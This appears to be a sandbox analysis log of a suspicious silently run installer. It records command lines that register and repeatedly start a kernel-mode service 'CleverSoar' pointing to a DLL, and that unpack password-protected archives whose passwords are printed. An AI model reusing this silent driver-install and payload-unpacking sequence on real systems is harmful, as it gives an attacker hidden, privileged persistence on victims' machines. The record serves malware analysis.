                        Commandline:"C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp" /SL5="$4043C,4740332,845824,C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" /VERYSILENT
                        Imagebase:0x5f0000
                        File size:3'366'912 bytes
                        MD5 hash:CCFB5265302C0ED10D4EE3C9C00B07B1
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:Borland Delphi
                        Antivirus matches:
                        • Detection: 0%, ReversingLabs
                        Reputation:low
                        Has exited:true

                        Target ID:7
                        Start time:03:45:16
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:8
                        Start time:03:45:16
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:9
                        Start time:03:45:16
                        Start date:22/12/2024
                        Path:C:\Program Files (x86)\Windows NT\7zr.exe
                        Wow64 process (32bit):true
                        Commandline:7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
                        Imagebase:0x180000
                        File size:831'200 bytes
                        MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Antivirus matches:
                        • Detection: 0%, ReversingLabs
                        Has exited:true

                        Target ID:10
                        Start time:03:45:16
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:11
                        Start time:03:45:16
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:12
                        Start time:03:45:17
                        Start date:22/12/2024
                        Path:C:\Program Files (x86)\Windows NT\7zr.exe
                        Wow64 process (32bit):true
                        Commandline:7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
                        Imagebase:0x180000
                        File size:831'200 bytes
                        MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:13
                        Start time:03:45:17
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:14
                        Start time:03:45:17
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:15
                        Start time:03:45:17
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:16
                        Start time:03:45:17
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:17
                        Start time:03:45:17
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:18
                        Start time:03:45:17
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:19
                        Start time:03:45:17
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:20
                        Start time:03:45:17
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:21
                        Start time:03:45:17
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:22
                        Start time:03:45:17
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:23
                        Start time:03:45:17
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:24
                        Start time:03:45:17
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:25
                        Start time:03:45:17
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:26
                        Start time:03:45:17
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:27
                        Start time:03:45:17
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:28
                        Start time:03:45:18
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:29
                        Start time:03:45:18
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:30
                        Start time:03:45:18
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:31
                        Start time:03:45:18
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:32
                        Start time:03:45:18
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:33
                        Start time:03:45:18
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:34
                        Start time:03:45:18
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:35
                        Start time:03:45:18
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:36
                        Start time:03:45:18
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:37
                        Start time:03:45:18
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:38
                        Start time:03:45:18
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:39
                        Start time:03:45:18
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:40
                        Start time:03:45:18
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:41
                        Start time:03:45:18
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:42
                        Start time:03:45:19
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:43
                        Start time:03:45:19
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:44
                        Start time:03:45:19
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:45
                        Start time:03:45:19
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:46
                        Start time:03:45:19
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:47
                        Start time:03:45:19
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:48
                        Start time:03:45:19
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:49
                        Start time:03:45:19
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:50
                        Start time:03:45:19
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:51
                        Start time:03:45:19
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:52
                        Start time:03:45:20
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:53
                        Start time:03:45:20
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:54
                        Start time:03:45:20
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:55
                        Start time:03:45:20
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:56
                        Start time:03:45:20
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:57
                        Start time:03:45:20
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:58
                        Start time:03:45:20
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:59
                        Start time:03:45:20
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:60
                        Start time:03:45:20
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:61
                        Start time:03:45:20
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:62
                        Start time:03:45:20
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:63
                        Start time:03:45:20
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:64
                        Start time:03:45:20
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:65
                        Start time:03:45:20
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:66
                        Start time:03:45:20
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:67
                        Start time:03:45:20
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:68
                        Start time:03:45:20
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:69
                        Start time:03:45:20
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:70
                        Start time:03:45:20
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:72
                        Start time:03:45:21
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:73
                        Start time:03:45:21
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:74
                        Start time:03:45:21
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:75
                        Start time:03:45:21
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

